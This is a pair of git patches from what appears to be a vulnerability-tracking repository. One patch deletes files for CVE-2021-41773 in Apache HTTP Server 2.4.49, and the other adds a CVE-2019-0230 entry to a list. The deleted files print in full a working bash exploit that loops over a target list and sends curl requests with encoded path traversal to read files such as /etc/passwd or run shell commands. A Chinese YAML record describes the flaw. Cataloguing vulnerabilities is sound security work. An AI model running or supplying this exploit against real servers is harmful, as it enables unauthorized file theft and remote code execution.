+0000 Subject: [PATCH 53/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2019/CVE-2021-41773/CVE-2021-41773.sh | 22 --------------- .../2019/CVE-2021-41773/README.md | 27 ------------------- .../2019/yaml/CVE-2021-41773.yaml | 27 ------------------- 3 files changed, 76 deletions(-) delete mode 100644 cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh delete mode 100644 cve/apache-HTTP Server/2019/CVE-2021-41773/README.md delete mode 100644 cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml diff --git a/cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh b/cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh deleted file mode 100644 index 2546e270..00000000 --- a/cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh +++ /dev/null @@ -1,22 +0,0 @@ -# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -# Date: 10/05/2021 -# Exploit Author: Lucas Souza https://lsass.io -# Vendor Homepage: https://apache.org/ -# Version: 2.4.49 -# Tested on: 2.4.49 -# CVE : CVE-2021-41773 -# Credits: Ash Daulton and the cPanel Security Team - -#!/bin/bash - -if [[ $1 == '' ]]; [[ $2 == '' ]]; then -echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] -echo ./PoC.sh targets.txt /etc/passwd -exit -fi -for host in $(cat $1); do -echo $host -curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done - -# PoC.sh targets.txt /etc/passwd -# PoC.sh targets.txt /bin/sh whoami \ No newline at end of file diff --git a/cve/apache-HTTP Server/2019/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2019/CVE-2021-41773/README.md deleted file mode 100644 index d4d61313..00000000 --- a/cve/apache-HTTP Server/2019/CVE-2021-41773/README.md +++ /dev/null @@ -1,27 +0,0 @@ -# Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -Date: 10/05/2021 -Exploit Author: Lucas Souza https://lsass.io -Vendor Homepage: https://apache.org/ -Version: 2.4.49 -Tested on: 2.4.49 -CVE : CVE-2021-41773 -Credits: Ash Daulton and the cPanel Security Team -``` -#!/bin/bash - -if [[ $1 == '' ]]; [[ $2 == '' ]]; then -echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] -echo ./PoC.sh targets.txt /etc/passwd -exit -fi -for host in $(cat $1); do -echo $host -curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done -``` -# Usage -``` -PoC.sh targets.txt /etc/passwd -PoC.sh targets.txt /bin/sh whoami -``` - diff --git a/cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml deleted file mode 100644 index 420c8e1a..00000000 --- a/cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2021-41773 -source: https://www.exploit-db.com/exploits/50383 -info: - name: Apache HTTPd 是Apache基金会开源的一款HTTP服务器。 - severity: critical - description: - 2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。 - scope-of-influence: - Apache HTTP Server = 2.4.49 - reference: - - https://apache.org/ - - https://www.exploit-db.com/exploits/50383 - - https://blog.csdn.net/qq_48985780/article/details/120973100 - - https://www.oracle.com/security-alerts/cpujan2022.html - - http://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html - - http://www.openwall.com/lists/oss-security/2021/10/08/1 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41773 - cwe-id: CWE-22 - cnvd-id: None - kve-id: None - tags: - - Apache HTTP Serve - - 路径穿越 - - 任意文件读取 -- Gitee From 1ebf5c5055a0e651ca7fe7ba75b1ffcf394ab8be Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 08:27:43 +0000 Subject: [PATCH 54/54] update openkylin_list.yaml. Signed-off-by: fanyunpeng --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 5a8b7367..1f85da68 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -18,6 +18,8 @@ cve: - CVE-2022-33891 apache-tomcat: - CVE-2020-13935 + apache-Struts: + - CVE-2019-0230 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 -- Gitee